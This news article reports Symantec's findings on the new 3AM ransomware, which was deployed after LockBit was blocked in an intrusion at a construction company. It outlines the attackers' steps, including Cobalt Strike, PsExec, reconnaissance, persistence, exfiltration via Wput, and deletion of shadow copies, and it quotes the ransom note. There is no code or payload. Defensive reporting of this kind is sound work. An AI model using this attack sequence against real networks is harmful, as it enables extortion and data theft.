When LockBit Ransomware Fails, Attackers Deploy Brand-New 3AM

Nothing good happens after 2 a.m., they say, especially when hackers have two kinds of ransomware at their disposal.

In a recent attack against a construction company, hackers who failed to execute LockBit in a target network were observed deploying a second, never-before-seen ransomware, which managed to break through.
The new tool is rather standard fare, blocking various cybersecurity and backup-related software before locking up files on its host computer. But it distinguishes itself with an adorable little theme: 3 a.m., a time when perhaps only insomniacs, hardcore night owls, and black hat hackers are still up and working away.
In a report this week
, researchers from Symantec described the first observed use of 3AM — a double-whammy attack in which the LockBit ransomware was blocked but then 3AM squeaked through in one compromised machine.
This is not the first time weve seen attackers use more than one ransomware family, warns Dick OBrien, principal intelligence analyst for the Symantec threat hunter team. Organizations should expect this to happen.
Upon infiltrating its target network, the threat actors in this case immediately began gathering user information and deploying tools for data harvesting. Early on, for instance, they deployed Cobalt Strike and used the remote command tool PsExec to try to escalate privileges.
Next, they ran reconnaissance commands like whoami (prints the username), netstat (displays the network status), and so on; attempted to list other servers they could use for lateral movement; and added a new user for purposes of persistence. Then, they used the Wput utility to upload the victims files to their own file transfer protocol (FTP) server.
At this point, with everything in place, the attackers intended to deploy
LockBit — the latest sensation in modern ransomware-as-a-service
. Unfortunately for them, the targets cybersecurity protections wholly blocked the deployment of LockBit.
But unfortunately for the victim, the attackers had a second cyber weapon on hand: 3AM. The malware is so named because it appends encrypted files with the suffix .threeamtime and references that time of day in its ransom note.
Hello, the note begins. 3 am The time of mysticism, isnt it? All your files are mysteriously encrypted, and the systems show no signs of life, the backups disappeared. But we can correct this very quickly and return all your files and operation of the systems to
[sic]
original state.
Compared with the note, the authors demonstrated less creativity in writing the malware itself.
3AM is a 64-bit executable written in Rust,
an increasingly popular coding language for hackers
and
defenders alike
. It has a long list of security and backup-related software it attempts to kill on its host machine, then proceeds to do its dirty work: scanning the disk, identifying certain kinds of files, encrypting them, dropping the ransom note, then deleting any
Volume Shadow (VSS) backup copies of files
that might otherwise give the victim respite.
In this first deployment, attackers only managed to deploy 3AM onto three machines, and it was subsequently blocked on two. It successfully penetrated the third, though, where LockBit could not. Rather than some testament to the power of 3AM, OBrien figures, it likely worked because it was a previously unseen threat, whereas LockBit is known. The hackers claim to have stolen sensitive data from the compromised machine, though Symantec could not verify that.
When it comes to stopping a piece of ransomware, let alone two, OBrien advises that defense in depth is the best strategy. Ransomware attacks are a multistage operation, and organizations should address all stages of a potential attack and not just focus on blocking payloads.
The earlier you stop an attack, the better, he says.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
When LockBit Ransomware Fails, Attackers Deploy Brand-New 3AM